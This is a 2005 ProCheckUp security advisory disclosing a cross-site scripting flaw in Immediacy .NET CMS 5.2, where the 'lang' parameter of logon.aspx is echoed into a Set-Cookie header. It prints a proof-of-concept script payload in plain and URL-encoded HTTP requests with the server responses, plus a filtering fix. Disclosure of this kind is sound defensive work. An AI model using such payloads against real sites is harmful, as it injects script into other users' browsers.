PR05-06: Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie This advisory has been published following consultation with UK NISCC <http://www.niscc.gov.uk/> Date found: 2005-02-27 Vulnerable: Immediacy .NET CMS 5.2 Severity: Low Author: Gemma Hughes [gemma.hughes at procheckup.com] Vendor Status: CVE Candidate not Assigned Description: Immediacy CMS appears to allow Cross Site Scripting attacks via a malformed 'Set-Cookie:' header. This issue concerns the 'logon.aspx' program and 'lang' variable. This could allow attackers to cause the execution of malicious script code within the context of the vulnerable site. Note: web browser-specific CRLF injection techniques may be required in order to exploit this issue. Information: REQUEST: GET /logon.aspx?lang=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1 Host: example.host.co.uk Cookie: ASINFO=...; ASP.NET_SessionId=...; CNBOOK=...; ASPSESSIONIDSCDAQTST=... Referer: http://example.host.co.uk:80/environ.pl User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705) Connection: close RESULT: HTTP/1.1 302 Found Connection: close Date: Sun, 27 Feb 2005 19:18:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /generalerror.aspx?aspxerrorpath=/logon.aspx Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>; expires=Mon, 27-Jun-2005 18:18:31 GMT; path=/ Content-Type: text/html; charset=utf-8 Content-Length: 161 Set-Cookie: ASINFO=... Set-Cookie: CNBOOK=... Cache-Control: proxy-revalidate <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2> </body></html> It is also possible to submit the request using byte-encoded characters: REQUEST: GET /logon.aspx?lang=%3CSCRIPT%3Ealert%28'Can%20Cross%20Site%20Attack'%29%3C %2FSCRIPT%3E&page=272& HTTP/1.1 Host: example.host.co.uk Cookie: ASINFO=...; lang=cy; ASP.NET_SessionId=...; CNBOOK=ClearNet; ASPSESSIONIDSCDAQTST=... Referer: http://example.host.co.uk:80/default.aspx User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705) Connection: close RESULTS: HTTP/1.1 302 Found Connection: close Date: Sun, 27 Feb 2005 19:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /generalerror.aspx?aspxerrorpath=/logon.aspx Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>; expires=Mon, 27-Jun-2005 18:29:27 GMT; path=/ Content-Type: text/html; charset=utf-8 Content-Length: 161 Set-Cookie: ASINFO=... Set-Cookie: CNBOOK=ClearNet;path=/;domain=.host.co.uk;expires=Fri, 31 Dec 2010 00:00:01 GMT Cache-Control: proxy-revalidate <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2> </body></html> Consequences: An attacker might cause the execution of malicious script code in the client (web browser) within the context of the site running the vulnerable version of Immediacy .NET CMS. Fix: Contact vendor. Ensure all input is filtered, especially the '<' and '>' characters. References: http://www.procheckup.com/Vulner_PR0506.php http://www.immediacy.co.uk/ Legal: Copyright 2005 ProCheckUp Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party.